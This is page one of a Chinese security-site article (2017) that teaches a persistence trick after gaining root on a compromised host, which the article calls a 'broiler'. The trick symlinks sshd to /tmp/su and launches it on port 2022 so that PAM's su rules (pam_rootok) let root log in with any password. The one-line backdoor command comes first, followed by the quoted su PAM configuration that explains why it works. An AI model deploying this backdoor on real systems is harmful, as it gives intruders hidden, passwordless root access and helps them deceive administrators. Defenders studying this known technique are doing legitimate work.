欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

利用系统特性伪装成一个免密登陆后门

来源:本站整理 作者:knpewg85942 时间:2017-07-04 TAG: 我要投稿

这是一个使用到了一点小伎俩的后门,如果渗透进入一个系统并拿到root权限的shell,对方防火墙没有限制,则可以通过本文的方法运行一个root可登陆且不需要权限的ssh后门。 这可以用来欺骗一些没有安全意识和经验的系统管理员可以在肉鸡上执行以下命令,运行这个ssh后门
# ln -sf /usr/sbin/sshd /tmp/su;nohup /tmp/su -oPort=2022 &

然后打开一个新的登陆会话测试一下:

账户root, 密码随便填写

登陆成功

0×01. 为什么可以免密登陆
上面的后门运行的进程名是su,当用户登录的时候,会去/etc/pam.d/下寻找su文件(其实这里不一定要是su文件,只要/etc/pam.d 目录下存在和后门的进程名同名的文件,则系统在认证的时候就会去读取这个文件内容进行认证), 内容参考如下(kali2 系统)
    #
    # The PAM configuration file for the Shadow `su' service
    #
   
    # This allows root to su without passwords (normal operation)
    auth       sufficient pam_rootok.so
   
    # Uncomment this to force users to be a member of group root
    # before they can use `su'. You can also add "group=foo"
    # to the end of this line if you want to use a group other
    # than the default "root" (but this may have side effect of
    # denying "root" user, unless she's a member of "foo" or explicitly
    # permitted earlier by e.g. "sufficient pam_rootok.so").
    # (Replaces the `SU_WHEEL_ONLY' option from login.defs)
    # auth       required   pam_wheel.so
   
    # Uncomment this if you want wheel members to be able to
    # su without a password.
    # auth       sufficient pam_wheel.so trust
   
    # Uncomment this if you want members of a specific group to not
    # be allowed to use su at all.
    # auth       required   pam_wheel.so deny group=nosu
   
    # Uncomment and edit /etc/security/time.conf if you need to set
    # time restrainst on su usage.
    # (Replaces the `PORTTIME_CHECKS_ENAB' option from login.defs
    # as well as /etc/porttime)
    # account    requisite  pam_time.so
   
    # This module parses environment configuration file(s)
    # and also allows you to use an extended config
    # file /etc/security/pam_env.conf.
    #
    # parsing /etc/environment needs "readenv=1"
    session       required   pam_env.so readenv=1
    # locale variables are also kept into /etc/default/locale in etch
    # reading this file *in addition to /etc/environment* does not hurt
    session       required   pam_env.so readenv=1 envfile=/etc/default/locale
   
    # Defines the MAIL environment variable
    # However, userdel also needs MAIL_DIR and MAIL_FILE variables
    # in /etc/login.defs to make sure that removing a user
    # also removes the user's mail spool file.
    # See comments in /etc/login.defs
    #
    # "nopen" stands to avoid reporting new mail when su'ing to another user
    session    optional   pam_mail.so nopen
   
    # Sets up user limits according to /etc/security/limits.conf
    # (Replaces the use of /etc/limits in old login)
    session    required   pam_limits.so

[1] [2]  下一页

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载